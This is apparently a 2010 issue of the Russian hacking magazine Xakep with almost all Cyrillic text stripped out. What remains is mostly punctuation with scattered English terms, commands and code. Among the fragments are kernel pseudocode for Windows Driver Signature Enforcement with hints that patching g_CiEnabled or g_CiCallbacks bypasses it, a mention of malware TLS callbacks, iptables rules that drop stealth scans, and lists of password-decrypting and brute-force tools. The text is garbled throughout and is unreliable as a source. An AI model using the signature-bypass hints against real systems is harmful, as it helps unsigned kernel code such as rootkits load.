, Driver Signature Enforcement, , TLS Thread
Local Storage,
PE-.

- Driver Signature
Enforcement

, Windows Vista, Microsoft


( )
( Vista 64- ).
, , ,
. , , .
Windows Vista/7 ,
, Verisign
Thawte.
- . , , ,
. ,
, ,
.
,
. , ,
, Driver Signature Enforcement.
i.dll, , , /%systemroot%/system32.
:
X 10 /141 10

CiCheckSignedFile
CiFindPageHashesInCatalog
CiFindPageHashesInSignedFile
CiFreePolicyInfo
CiGetPEInformation
CiInitialize
CiVerifyHashInCatalog

CiInitialize,
, :
VOID SepInitializeCodeIntegrity()
{
ULONG CiOptions;
{spipped...}
memset( g_CiCallbacks, 0, 3*sizeof ( SIZE_T ));
CiOptions = 4|2;
if(KeLoaderBlock)
{
if(*(ULONG*)(KeLoaderBlock+84))
{
if(SepIsOptionPresent((KeLoaderBlock+84),
L"DISABLE_INTEGRITY_CHECKS"))
CiOptions = 0;
if(SepIsOptionPresent((KeLoaderBlock+84),
L"TESTSIGNING"))
CiOptions |= 8;
}
CiInitialize(CiOptions,(KeLoaderBlock+32),

119

CODING

F8 Vista
&g_CiCallbacks);
}
}

, CiInitialize
:
g_CiCallbacks[0] = CI!CiValidateImageHeader,
g_CiCallbacks[1] = CI!CiValidateImageData,
g_CiCallbacks[2] = CI!CiQueryInformation.


:
nt!SepInitializeCodeIntegrity
nt!SepInitializationPhase1 + 0x1a1
nt!SeInitSystem + 0x29
nt!Phase1InitializationDiscard + 0x7ce
nt!Phase1Initialization + 0xd
nt!PspSystemThreadStartup + 0x9e
nt!KiThreadStartup + 0x19

, SepInitializeCodeIntegrity ( ,
CiInitialize)
. CiInitialize,
, , Boot Driver List ( , ).
,
.
.
Vista/7 :
nt!MmLoadSystemImage
nt!MiObtainSectionForDriver
nt!MiCreateSectionForDriver
nt!MmCheckSystemImage

120

Windows Boot Manager 0xc0000428


tcpip.sys
nt!NtCreateSection
nt!MmCreateSection
nt!MiValidateImageHeader
nt!SeValidateImageHeader
nt!_g_CiCallbacks[0] .. CI!CiValidateImageData

SeValidateImageHeader ,
.
:
nt!g_CiEnabled ( , ,
:)) , TRUE,
nt!g_CiCallbacks[0].
NULL, .
nt!g_CiCallbacks[0] , 0xc0000428,
Windows cannot
verify the digital signature of this file.
nt!g_CiEnabled FALSE,
, ,
STATUS_SUCCESS. !
WIndows Vista / 7 , .
: , ,
. -
,
. , ,
nt!g_CiEnabled, nt!g_CiCallbacks
.

RTFM

TLS? Thread Local Storage,


,
Windows.
,
.
TLS
, .
X 10 /141/ 10

, ...

, -,
?

, . ,
, ,
, TLS. , .
. , ? ,
ThreadProc
. TLS?
?
TLS Windows
, , kernel32 (TlsGetValue, TlsSetValue, TlsAlloc TlsFree), ,
,
, __declspec(thread) . :
?. : TLS
Windows
Vista , __declspec(thread)
, LoadLibrary(Ex),
Access Violation. ? ,
__declspec(thread) .
DLL
__declspec( thread ), . DLL
LoadLibrary ,
__declspec( thread ).
,
, ,
DLL. LoadLibrary
,
__declspec (thread).
DLL API TLS, TlsAlloc, TLS,
DLL LoadLibrary.

, , . ? TLS ? !
PE- (TLS-callback),

. ,
. PE-
, TLS . , , ,
.
TLS , , ,
crackme ,
. Blacklight ,
callback TLS (Thread Local Storage).
Blacklights TLS callback ,
(fork) , .
TLS-,
( DLL),
shell-.
,
, ,
. directory table.
, TLS .
TLS (http://
www.xakep.ru/magazine/xa/118/080/1.asp).

X 10 /141 10

, . ? .
:). , ,
][, ! z

121

SYN/ACK
dhsilabs@mail.ru


LIVEDVD/LIVEUSB
( )
Norton Ghost. Windows (
. .).
.
, , LiveCD/DVD.
?
, LiveCD.
, LiveCD?
, .
:
. ,
, ,
. -
. ? LiveCD,
. , LiveCD (,
LiveDVD,
LiveCD)
. ! . . ,
tar/tgz. 40 ,
, . .
.
, , , ( , ,
,
:)). ,
. 10, 20, 50! .
, LiveCD
.
( + ),
LiveCD 30 (
, ),
. , ,
LiveCD, .

122

40 , N ,
N . ? ,
. LiveCD . 10
= 15 ( ). 10
. ,
, . , !
, .
LiveUSB / , DVD -. LiveCD
.
, LiveCD
/ .
/home,
DVD-.
( ), .

?

Clonezilla. LiveCD, . http://clonezilla.
org : 10 Clonezilla SE
5,6 41 .
10 . ,
, . ,
Clonezilla ,
Windows FreeBSD.
, Remastersys Backup (http://www.geekconnection.org/remastersys/).
, Debian Ubuntu (
X 10 /141/ 10

, Debian),
, , , Fedora Mandriva.
Slackware Linux Live (http://www.linuxlive.org). LiveCD, LiveUSB.
Slackware ?
-
Ubuntu.
, , mklivecd ( Remastersys Backup)
LiveCD Mandriva. , ,
.
- .

CLONEZILLA: NORTON GHOST


Clonezilla ,
( LiveCD
),
.
, / :
1. http://clonezilla.org/download/sourceforge/ ISO-
Clonezilla Live ;
2. Clonezilla Live,
. Clonezilla live.
(, ), Other modes of
Clonezilla live Clonezilla.
Debian , ;
3. . , , . ,
( ?), Don't
touch keymap;
4. Start Clonezilla;
5. device-image: .
device-device ,
;
6. , ,
( ). local_
dev, .
( ) SSH, NFS (Network File System, Need For Speed!)
MS Windows (samba_server);
X 10 /141/ 10

7. , .
, , , Clonezilla ;
8. . savedisk
, saveparts
, restoredisk
, restoreparts
, recovery-iso-zip
;
9. ,
, ;
10. ( Linux), . ,
!
11. recovery-iso-zip LiveDVD/USB,
: iso
DVD, zip LiveUSB, both
,
LiveDVD, LiveUSB. ()
/home/partimag.
! , .
(, ) , /
,
.

REMASTERSYS BACKUP: DEBIAN/UBUNTU


Clonezilla, ,
Remastersys Backup ,
Debian Ubuntu,
ISO- ,
.
Remastersys : , Remastersys, Remastersys,
ISO-, .
Remastersys. sources.list:
sudo nano /etc/apt/sources.list

:
# GRUB v1

123

SYN/ACK

Clonezilla Live

deb http://www.geekconnection.org/remastersys/
repository ubuntu/
# GRUB2
deb http://www.geekconnection.org/remastersys/
repository karmic/

:
sudo apt-get update
sudo apt-get install remastersys

remastersys :
sudo remastersys backup|clean|dist [cdfs|iso]
[filename.iso]

:
backup , ( /home);

Clonezilla

(
GPL);
Ext2, Ext3, Ext4, ReiserFS,
Reiser4, XFS, JFS, FAT, NTFS, HFS (MacOS), UFS (FreeBSD,
NetBSD, OpenBSD), VMFS (VMWare ESX),
Linux, MS Windows, Mac OS
(Intel), FreeBSD, NetBSD OpenBSD;
LVM2 (LVM ver 1 );
GRUB 1 2;
Clonezilla SE (Server Edition)
Multicast , ,
PXE Wake-on-LAN;
Clonezilla , .

124

Debian

clean ,
.
( ), , , ;
dist . , backup,
/home;
cdfs ISO-
(, ISO- );
iso , ISO- ;
[filename.iso] , ISO-,
/home/remastersys.
backup,
, , , . ,
(,
, , , ).
GUI, GUI-
(
,
).

sudo remastersys-gui

LiveUSB Ubuntu , -

Cc

http://clonezilla.org/clonezilla-server-edition/
Clonezilla Server Edition
http://www.cyberciti.biz/tips/download-linuxclonezilla-to-clone-system.html Clonezilla (
)
http://wiki.centos.org/HowTos/PXE/Clonezilla
Clonezilla/DRBL- CentOS/Fedora
https://wiki.edubuntu.org/
SettingUpClonezillaDRBLonUbuntu
Clonezilla/DRBL- Ubuntu
http://www.geekconnection.org/remastersys/ubuntu.
html Remastersys Ubuntu
X 10 /141/ 10

remastersys-gui

LiveUSB

Clonezilla

USB-. ,
(4 , 2 )
Make startup disk.
.
X 10 /141/ 10

LINUX LIVE: SLACKWARE


Slackware. ,
, Ubuntu, . LiveCD Slackware :
( ) : aufs, squashfs.
,
Linux Live (http://www.linux-live.org). ,
2.6.27.27 i486,
Slackware 64-
. Slackware 13 2.6.33, , ,
, LiveCD . (aufs,
squashfs lzma) Linux Live;
, , man', ;
Linux Live http://www.linux-live.org
/tmp;
.config, ;
./build ( /tmp) root. LiveCD /tmp/live_data_NNNN, NNNN
;
make_iso.sh, ISO- bootinst.sh
LiveUSB.
SUMMARY
, ? Debian
Ubuntu, Remastersys
Backup. , ,
Clonezilla , .
Slackware Live, ,
, , Clonezilla . z

125

SYN/ACK
luchnik@it-university.ru, www.it-university.ru


AD CS?
CERTIFICATE SERVICES
WINDOWS SERVER 2008 R2 VS. WINDOWS SRVER 2003
, , SSL-, S/MIME- , .
, ,
, Microsoft
Certificate Services.
Windows Server 2008
Active Directory. Active Directory
Certificate Services (AD CS) , ,
. ,
,
. AD CS Windows Server 2008 R2
:
1. Certification authorities (CAs)
(root) (subordinate)
( ),
, .
2. Web enrollment
-.
3. Online Responder .
4. Network Device Enrollment Service (NDES)
.
SCEP (Simple Certificate Enrollment
Protocol), Cisco. NDES IIS
HKEY_LOCAL_ROOT\Software\
Microsoft\Cryptography\MSCEP.
5. Certificate Enrollment Web Service HTTPS.
6. Certificate Enrollment Policy Web Service
HTTPS. , Web Service
AD LDAP.
Windows Server Certificate Services , Certificate
Services CA Certificate Services Web Enrollment Support,
Windows Server 2008 R2.

126

AD CS
AD CS Itanium Windows Server 2008,
Server Core AD CS , Windows Server 2008 R2.
AD CS Server
2008 ( CA,
Restricted Enrollment Agent ),
R2 (
).
,
CA, Online Responder Web enrollment . AD CS AD DS (Active Directory
Domain Services).
AD CS Server 2008 Server 2008 R2 ,
Windows Server 2003. Certificate
Enrollment Web Services 47 ,
Windows Server 2008 R2. IIS.
AD CS
Server Manager. ,
CAPolicy.inf,
%SYSTEMROOT%.
Certification Authority Certificate Enrollment Web
Service, , CA
Web Service.
Windows Server 2008 COM- ( ICertSrvSetup MSDN),
CA. ,
VBScript.
.
X 10 /141/ 10

. ,
(HSM). ,
(,
),
, HSM.
Microsoft Windows Server 2003 SP1.
AD CS MMC-, .
, Certificates
(certmgr.msc), Certification Authority (certsrv.msc) Certificate
Templates (certtmpl.msc), certutil.exe ertreq.exe.
Online Responder Management (ocsp.msc)
. , Enterprise PKI (pkiview.msc), Windows
Server 2003 Resource Kit PKI Health Tool.
Enterprise PKI
CA, CA, AIA (Authority Information Access) .
PKI. Pkiview ,
CA,
, .
AD CS
Server 2008 R2.
%SYSTEMDRIVE%\ProgramData\Microsoft\Crypto\Keys,
%SYSTEMDRIVE%\Users\All
Users\Microsoft\Crypto\Keys,
.
CA System
State Backup, .
certutil backupKey
<___> Certification Authority.



,
X 10 /141/ 10

.
Enterprise CA . Windows
Server 2000 ,
, ,
.
, (certificate autoenrollment) Windows
Server 2003.
Windows Server 2008 3,
CNG (Cryptography Next Generation).
CNG CryptoAPI, CryptoAPI 1.0 ,
,
. , NSA Suite B Cryptography (
)
, Windows Vista. , ,
,
, Windows XP Windows Server 2003,
, RSA, CNG.
- , CSP
(Cryptography Service Provider) -
CNG.

Enterprise Datacenter. Standard
Server 2008 R2.
CA Windows Server 2003.
Windows Server 2008 R2 Windows 7
(Certificate Template API),
.
, , : , .
,

127

SYN/ACK

Enterprise PKI
Certificate Enrollment Web Services

.
, . certtmpl.msc,
, ,
(,
, ).

CA
Web Enrollment.

, Certificates.


, ? ,
? , ,
PKCS#10 certreq
CA, ,
. ,
.
,
.
,
CA, -. Web Enrollment, ,
, . XEnroll.dll,

, CertEnroll.dll,
, , . Web
Enrollment PKCS #10 ,
.
Windows Server 2008
Kerberos,
Distributed COM (DCOM).
(autoenrollment) , ,
, , . CA Web Enrollment, Server 2008 R2,
WS-Trust. Certificate
Enrollment Policy Web Service Certificate Enrollment Web Service

HTTPS.
Kerberos, , .
CA
, , ,
, , ,
(renewal-only).
, CA,

VS. ONLINE RESPONDER


.
, ,
, , .

(CRL (certificate revocation list)). ,
,
.
, ,
. (Delta CRL),
,
.
Delta CRL ,
, .
,
, , CRL
.
Windows Server 2008 (Online
Responder). . Online Responder
OCSP (Online Certificate Status Protocol),
RFC 2560. ,

.

, ,
,
.
OCSP , Windows Vista.
(Certificate Path Validation Settings Revocation).
, Online Responder .
:
1. Online Responder AD CS.
Online Responder IIS, .

128

X 10 /141/ 10

enrollment policy

AIA Online Responder

Revocation Configuration
2. CA AIA , .
3. ,
Online Responder .
, ,
:
( ), id-pkix-ocsp-nocheck
id-kp-OCSPSigning, CDP AIA.
OCSP Response Signing.
Enterprise CA
Active Directory, (Read Enroll) , Online
Responder. StandAlone CA certutil -v -setreg policy\editflags +EDITF_
ENABLEOCSPREVNOCHECK.
Windows Server 2003 .
4. .
Online Responder Management
revocation configuration.
5. Online Responder ,
CA, Online Responder
. CA certutil -setreg
ca\UseDefinedCACertInRequest 1.
Online Responder , CA, , .
Windows 2003
X 10 /141/ 10

OCSP, , CA.

, .

Windows
Server 2008, R2. ,
, ,
, , .
-, . OCSP,
, -
Microsoft. ,
,
,
.
. ,
, ,
.
-, (, Crypto API XEnroll.dll) , -
, .
-, .
,
CA.
,

. z

129

SYN/ACK
, InfoWatch




. , , , ,
. .

, .
- . , , ... .
, ,
: . ( , ).
(
), , . .
.
, .
.
. . , ,
,
. , .
--- ,
50 ...
.
, ( ), -
. -
, ,
. , , , . ( )
. .

(, ,
,
. Computer drive
licence ).
, () .

- . , , ,
, ( )
, . , ,
, :

130

.
.


.
, -
,
,
.
, :
. ,
: ,
, .
, ,
. .
. , , :
, , ,
. , .
( ),
( ), .
,
.
. -
IP-
( ,
).
(- )
. , .
, ,
. ,
, . .
, , .
, 272 ( ).
X 10 /141/ 10


,
. ,
.
(
). , ,
.
IT .
. .
,
.
: - ,
- , - !
XX , . ,
,
, , . ,
-
. .
.
.

. . , . .


(
,
). ,
. 1928 ,
,
, ,
. .
. ,
,
. X 10 /141/ 10


. , BSA IFPI,
. .
.
50
(. 7.12
), (. 2-3 . 146 ).
- .
, . .
. .
, , ,
, , (
, ). . ,
. ,
50 000 , , .
, , , . ,
:
. , -
.

.
: ,
. ( , )
.
,
(, ),
(, ), ,
(, , ), .
, , .
.
( ), (

: http://www.internet-law.ru/intlaw/crime/faq.htm).

131

SYN/ACK


.
, . - , , .
, ,
. ( )
,
.


.
. ,
. -, MS Office, - -
, SQL-, Java- -
. .
,
(
, . 1295 ). ,
. , , , . , (
) .
.
. 50 000
( ),
.
. , ,
.

(. 1 . 273 )
, .
(. 2 )
.
. ,
-4, .
273- ,
-


,
- ,
http://group.xakep.ru.
! ! ! ,
: lozovsky@gameland.ru
. ,

, ,

, .

132

.
,
- -
.
, (. 2
. 42 ), .
,
: , ,
, . ,
. .
, 273
,
(
, . ,
).

. ,
KGB Spy.
( ),
! , . ,
, ,
- ,
. ,
, .

,
, ( , , :
http://infowatch.livejournal.com/55585.html). ,
, .
, (, ,
)
. .
.
, .
() . (. 13.11 ).
, . ,
. .
.
(
, , , . 2 . 23 ).
, ICQ -,
,
.
,
/
.
,
. , , ,
. ,
, .
,

. (
) ; ,
X 10 /141/ 10

IT
( http://forensics.ru/
zi-ts.html).
, - . .
- ,
,
.


, . ,
. , ,
, ,
. ,
.
, ,
.
(. 171 ).
,
, .
: , ,
.

,
, .

,
. ? . ,
. , .
(
) , X 10 /141/ 10

, . ,
. , ,
. . .
.
, .
,
( ).
, DoS-, ,
, . ,
.
.
- , ,
.
. , .
/.
, .
.

.
, -,
,
. ,
, ,
. , . , .
, . , .
. z

133

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:


, : ,
, ?

, , ,
, ,
.
,
,

.

. , ,
, , , , , .
, ,
: ,
( ) - ,


; ,
,

, .
,
: ( ), ,
, , , .


, ,
, ,
. , ;
,
.
,
,

134

,
, ,
.

(phobos)
.
,
, ,
,
.
, ,
, -
( ) ,
, -
. , , ,
.
: , ?
, ,
.
, ,
:
, ,
, .
;
,
, ,
.
, ,
(
), ,

,
, .
- ,
. ,
,
, .

,

.
, ,
, . , .

;


;

.

: ,
, , ,
, ,
.
?
,
(),
, ,
;
,
.
X 10 /141/ 10

.
,
? -
,
,
,
. .
, - ,
, ,
,
, ,
.

, ,
,
, ,
.
. , ,
,
,
, ,
. (-,
)
.
,
.
,
,
.
,
X 10 /141/ 10

, ,
; ? ,


. ,
: -


. , , ,
, - ,
, .
, ,
, .
, . :
. , ;
. : , (,
: ,
, ,
); ,
, .
-: , , , .
;
.
, . ,
: , ,
. , ,
, .
, - .
, ,
. : , , , ( ), ( ), ( ). . .
, -. .

135

UNITS

,
, , . , ,
, ,
.
, ; (); , ;
; - , , ,
. ,
- , . , , .
. , ,
,
, . ,
, :
, .
, ,
, .
.
( ).
. , ,
: , , ,
, , ,
- ; - ,
. , , , .


.
, ,
.
, , ; , .
hom sapiens, ,
, (),
. ,
,
-
. ,
.

, ,
,

.
,
:
,

, ,
,
. ?

: ;
-

136


:
.
.
, ,
,
-
. ,
,
,


, : , , .
: ,
. -, .
, ,
? = = .
: ,
, - , , , ,
.
, ,
, . - ,
; - ,
, ; ,
, , , . , .

,
- ;
,
; .
: ,
.

, (
)
, :

.
.
, ,
; ,

,
, .

. ,
: , ,
X 10 /141/ 10

Joshua Hoffine ,

, ,

:)

PR

.
, ,
?
,
.
, ,
, , , , ,
,
. :


,
- .
.
, , ,
.
,
.
, : ,

: , ,
, ,
,
, .

:


, ,
. ,
, .
.
+ .
( ) + !
, . , .
, .

X 10 /141/ 10

. ,
.
,
,
,

.
,
-
. , ,
,
.
, ,
,
.

137

UNITS

. , ,
, ,
.
,
.

,
.

, ,

.
?

: ,
,

, .
,
, ,
,
(, ). , ,
:
; ,
;
,
, ,

,
. - : ,
:
! ?!
!.
,
: ,
,
,

500 .
, ?
- ,
! ?
30 .. ?
. ?.
,
. ,

,

, , :
.
, ,
,
,
-

138


, ,
,

.
, , , -,
,
. , ,
-.
,
, ,
, , , - , - , ,

. ,
, ,
.
, , , : ? ,
(- ).
, , - .
,
.
? ,
? , , ?
, , . !
,
, ,
. (,
,
),
,
.
, , ,
.

, ,
, ,
, ,
. , ,
,
, :


, ,

1. ,
.
, ,
.
,
.
,
,
, .
. , anyway
,
- .
2.
:
, ?.

. : , ,
:
;
, , ;
.
3. . ,

, ,
. ,

.
:
. ,
.
.
4.
. ,
, ,
-
.
5. ,
, ,
. ,
.
: . ,
:). z
X 10 /141/ 10

8.5

DVD

!
660 . !
? ?
.
.
( )




.

2100 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru

1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

UNITS
ant

faq
united
@real.xakep.ru

Q: ,

Q: -

, , -

CMS.

A: ,
,

. . Whatweb (www.
morningstarsecurity.com/research/whatweb)
- ,
(CMS), , JavaScript, .. ,
- ,
,
-,
..
250 , CMS . , WordPress,
,
WordPress wp-content.
,
:

A:
.
,
,
URL.
, , CeWL (www.
digininja.org/projects/cewl.php), ,
.
:), . Userpass.py (www.
pauldotcom.com/userpass.py)
Python, Google
Linkedin.com, CeWL. facebook,
myspace ..,
. :

$ ./whatweb www.
morningstarsecurity.com

140

$ python userpass.py "name".

name ,
(

). :
g ,

;
s (,
/ , security);
m , CeWL.
, . ,
.
Q: x64?
A:
. : .
, TDL3,

, . , TDL3

(
www.nobunkum.ru/issue003/tdss-botnet).
Win7 x64
X 10 /141/ 10

,
.
, ,
, .
(Disable PatchGuard & Driver
signature enforcement) x64
. TDL4
MBR
.
,
Mebroot. , ,
x64 .
Q: ,
DLL-?

A: .

LoadLibrary.
DLL
, Windows

( DLL).
DLL,
.
DLL,
Windows
DLL. DLL DLL LoadLibrary
LoadLibraryEx.
, .
.
16- .
Windows.
.
,
.
.
DLL,
,
.

, .
.
. , .
Windows
DLL
. DLL

.

DLL. API
SetDllDirectory (""). DLL
, LoadLibrary
X 10 /141/ 10

HDD
. , LoadLibrary
DLL
Windows. ,
.
Windows, ,

.

LoadLibrary,
DLL
SetDllDirectory(""),


SetDllDirectory("__").
Q: ?

A: schannel.dll, .

,
, Windows.
DWORD retval = SearchPath(NULL,
"schannel", ".dll", err, result,
NULL);
HMODULE handle =
LoadLibrary(result);


,
,
LoadLibrary().
,

.
, .
HMODULE handle =
LoadLibrary("schannel.dll");

Q: ,

?

A: -Microsoft
Process Monitor,

. Process
Monitor (http://technet.microsoft.com/en-us/
sysinternals/bb896645.aspx) ,
.
, . , ,

.
Process Monitor ,
.
.
Metasploit Ruby DLLHijackAuditKit (http://bit.ly/
DLLHijackAuditKit)
.
:
DLLHijackAuditKit;
procmon.exe
( Process Monitor);
Ruby (rubylang.org).
Start
Command Prompt with Ruby,
DLLHijackAuditKit.

141

UNITS

,
.
i386
2-100- ,
.
Q: PDF-. .

ProcMon' DLL Injection


audit.bat
! ,
,
CSV- ProcMon'.

.
DLLTest
ruby generate.rb.
Q: Nmap?
A: Nmap
,
.
TCP-,
. -
(, )
-
,
firewall'.
:
iptables -A INPUT -p tcp --tcp-flags
ACK,FIN FIN -j LOG --log-prefix
"Stealth scan"
iptables -A INPUT -p tcp --tcp-flags
ACK,FIN FIN -j DROP

--tcp-flags ACK,FIN FIN TCP-.


(ACK,FIN)
, , (FIN)
, .
, ,
FIN-, ACK. TCP-

142

,
.
Q:
?

A: , Windows : , . -
GParted (LiveCD Linux'),
.
,
.
HDD,

BootIt. , Vista/Windows7 , .
:

Flip Removable Bit.

. , (,
),
. ,
,
- .
Q: Python?
, .

A: PDFiD (blog.didierstevens.com/programs/
pdf-tools) , PDF-
, ;
PDF-parser
PDF ( );
Origami Walker (security-labs.org/origami)
PDF-;
Origami pdfscan ;
Origami extractjs Jsunpack-ns pdf.py JavaScript- PDF-;
Sumatra PDF (blog.kowalczyk.info/software/
sumatrapdf) MuPDF (ccxvii.net/mupdf) , ,
, ;
Malzilla (www.malzilla.org)
PDF,
JavaScript;
Jsunpack-n (jsunpack.blogspot.com/2009/06/
jsunpack-n-updates-for-pdf-decoding.html)
JavaScript
PCAP--,
PDF-.
Q: ,
Google ? c Picasa Web.

A: , googlecl
(code.google.com/p/googlecl),

. :
Blogger:
$ google blogger post --title "foo"
"command line posting"
Calendar:
$ google calendar add "Lunch with
Jim at noon tomorrow"
Contacts:
$ google contacts list name,email >
contacts.csv
Google Docs:
$ google docs edit --title "Shopping
list"
Picasa:
$ google picasa create --title "Cat
Photos" ~/photos/cats/*.jpg
Youtube:
$ google youtube post --category
Education killer_robots.avi

, .
?

A: . Psyco (psyco.sourceforge.net)
, Python


Google Data API Windows,
Linux. z
X 10 /141/ 10

>Misc
AltDrag 0.8
Camouflage v1.2.1
Daphne 1.47
FilerFrog 2.0.0
Find and Run Robot 2.90
Grindstone 2
HashTab 3.0
KeyPass 4.9.8
NirCmd 2.41
RegSeeker 1.55
Synchronicity 4.3
Synergy 1.3.4
System Silencer 1.2
True Launch Bar 4.4.13 RC

>Games
GunGirl 2 v1.11

Python:
ActivePython 2.7.0.2
Eric5 5.0.2
geany 0.19.1
IronPython 2.6.1
Jython 2.5.2b1
Komodo Edit 5.2.4
Komodo Edit 6.0.0b3
Komodo IDE 5.2.4
Komodo IDE 6.0.0b3
Portable Python 1.1
Pydev for Eclipse 1.6.1
PyScripter v2.2a
Python 2.7
Python 2.7 x64
Python 3.1.2
Python 3.1.2 x64
Spyder 1.1.4
Wing IDE 101 3.2.10
Wing IDE Professional 3.2.10
Wing IDE Professional 4.0.0b4

>Development
ClickHeat 1.10
ECMerge 2.2
UltraEdit 16.20.0
WinAppDbg 1.4

>System
AstroGrep 4.1.4
Auslogics Disk Defrag 3.1.8.150
Auslogics Registry Cleaner 2.0.4.40
BlueScreenView v1.28
CCleaner 2.35
Comodo Internet Security (32bit) 5.0
CrystalDiskMark 3.0.0g
Driver Magician 3.5
Emsisoft HiJackFree 4.0
FreeApps v1.0
GMER 1.0.15.15281
Open Hardware Monitor 0.1.37 Beta
Process Hacker 2.3
PWGen 2.04
Sandboxie 3.48
SetupBatteryCare 0.98
Speccy 1.04
SUMo 2.10.0.95
TechPowerUp GPU-Z v0.3.6

>Security
ChromePasswordDecryptor 1.6
DLLHijackAuditKit v2
DllHijackAuditor 1.0
DynamicLoadLibraryTest
ExploitMyUnion 2.1
FirePassword 3.6
FOCA Free 2.5.2
IEPasswordDecryptor 1.6
Nikto 2.1.3
NmapSI4
OperaPasswordDecryptor 1.0
ProcNetMonitor
RIPS 0.32
Vera 0.20
Wireshark 1.4.0
xsser 0.7a

>Net
Ad Muncher v4.9 Beta Build 32193
BluetoothView 1.40
digsby Build 82 Beta
gpg4win 2.1.0
Home Ftp Server 1.11.0.146
LanTopolog 2.05
Pidgin for Windows 2.7.3
QIP 2010 Build 4000
Skype 5.0 beta 2
TeamSpeak Client for Windows
3.0.0 Beta
TekSIP 2.9
Visual Router
Torrent 2.2beta

>Multimedia
AnyToISO
DualVR 1.7.3
Format Factory 2.5
Greenshot 0.8.0
Picasa for Windows 3.8 Build 115.45
ProgDVB 6.46.4
Songbird 1.8.0
VideoInspector 2.2.6.124
VLC (VideoLAN) for Windows 1.1.4

>Net
Balsa 2.3.28
Claws Mail 3.7.6
Deluge 1.2.2
Drivel 3.0.2
gnash 0.8.8
Google Chrome 5.0.375.127
Lightspark 0.4.3
Links 2.3
Midori 0.2.7
Mitter 0.4.5
Mozilla Firefox 3.6.8
OpenMeetings 1.2
Opera 10.61
Qwit 1.1

>Games
ManiaDrive 1.2

>Devel
ATI Stream SDK 2.2
boost 1.44.0
Fructose 0.9.0
Clojure 1.2
DrPython 3.11.3
GNU make 3.82
iText 5.0.4
MongoDB 1.6.0
Myjit 0.5.0.1
Nitro++ 1.3.39
PixelLight 0.9.2
Poppler 0.14.2
Ruby 1.9.2
SCons 2.0.1
Sdcc 2.9.0
Vaadin 6.4.3
WebIssues 0.9.6
Whoosh 0.3.18
Wt 3.1.4
ZinjaI 20100829

>>UNIX
>Desktop
Adobe Reader 9.3.4
amaroK 2.3.1
Audacious 2.4
Boxee 0.9.22.13
Cairo-dock 2.1.3
DigiKam 1.4.0
Droid 0.2.1
Feh 1.9
GCstar 1.6.1
Glippy 0.0.6.4
Imagination 2.1.1
Inkscape 0.48
KMyMoney 4.5
KOffice 2.2.2
Lifeograph 0.5.6
QGIS 1.5
QtiPlot 0.9.8.1
Shotwell 0.7.0
Vim 7.3
VLC 1.1.4
Webilder 0.6.9

Virtual Router

>System
ATI Catalyst 10.8
Bluez-tools 0.1.18
CDEmu 1.3.0
CLIcompanion 1.0
dd_rescue 1.20
Iptables 1.4.9
Linux Kernel 2.6.35.4
NTFS-3G 2010.8.8
PCSX-Reloaded 1.9.92
q4wine 0.119
SBackup 0.11.1
Smb4k 0.10.8
VirtualBox 3.2.8
Wine 1.3.0
Xorg server 1.9.0
ZFS 0.5

>Server
Apache 2.2.26
BIND 9.7.1
CUPS 1.4.4
DBMail 2.2.16
DHCP 4.2.0
Dovecot 2.0.0
Ejabberd 2.1.5
Freeradius 2.1.9
HAproxy 1.4.7
Lighttpd 1.4.28
MySQL 5.1.50
Nsd 3.2.6
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
Ora2Pg 6.3
Postfix 2.7
Samba 3.5.4
Squid 3.1.7
Vsftpd 2.3.2

>Security
CeWL 3.0
Clamav 0.96.2
Cvechecker 0.5
DotDotPwn 1.0
Firewall Builder 4.1.1
FuzzDiff
Graudit 1.7
Halberd 0.2.4
Listener 2.0.0
Nufw 2.4.3
RSMangler 1.1
Sipwitch 0.9.1
ssh2ftpcrack 2.0
Suricata 1.0.1
Voidssh
WhatWeb 0.4.5
Wireshark 1.2.10
Wpbruteforcer

RabbitMQ 2.0.0
RadioTray 0.6
RSSOwl 2.0.5
Seesmic 0.8
TeamViewer 5.0.8252
Vuze 4.5

AOL/ AOL

10(141) 2010

>>WINDOWS
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.4.1225
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.4.1
Firefox 3.6.8
foobar2000 1.1
K-Lite Mega Codec Pack 6.3.0
Miranda IM v0.9.2
Notepad++ 5.7
Opera 10.61
PuTTY 0.60
Skype 4.2
Sysinternals Suite
Total Commander 7.55
Unlocker 1.9.0
XnView 1.97.6
x 10 () 2010
141

METASPLOIT FRAMEWORK
-

LINUX

SALITY.AA

VPN-

. 66


AOL

AOL

10 (141) 2010



: 2
10
.

. 54

HACK IN THE BOX


HITB

. 34

. 48

CALLBACK:

UNITS

HTTP:// WWW2

PAYONEER

www.payoneer.com
: ?. (GetAFreelancer,
RentACoder, oDesk, eLance)
. ,
Payoneer (www.payoneer.com),
.
.
Payoneer,
. Payoneer
PayPal, .

TORRENTZ

.torrent

www.torrentz.com
- , .torrent - Google .torrent.

torrentdownloads.net. ,
torrent-.
torrentz.com isohunt.com.
.torrent
. , ,
: torrtilla.ru, 2torrents.org,
kinobaza.tv.

HOW SECURE IS MY
PASSWORD?
www.howsecureismy
password.net

: ,
,
.
. , ,
, .
howsecureismypassword.net, gfhjkm (
) ,
PC 30 . :
, .
#R00t$H3ll 195 , , ,
abcdefg1234567 5722 .

144

IORAD

www.iorad.com
, - .
, ,
, , , .
,
- IORAD.
,
Capture.
X 10 /141/ 10